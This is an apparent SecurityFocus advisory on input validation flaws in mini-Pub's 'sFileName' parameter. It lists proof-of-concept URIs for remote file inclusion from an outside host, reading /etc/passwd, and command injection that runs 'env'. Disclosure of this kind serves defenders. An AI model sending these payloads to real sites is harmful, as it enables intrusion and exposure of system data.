mini-Pub 'sFileName' Parameter Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/mini-pub.php/front-end/img.php?sFileName=http://www.example2.com/cmd.txt?
http://www.example.com/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
http://www.example.com/mini-pub.php/front-end/cat.php?sFileName=a%3B=env


 

Privacy Statement
Copyright 2010, SecurityFocus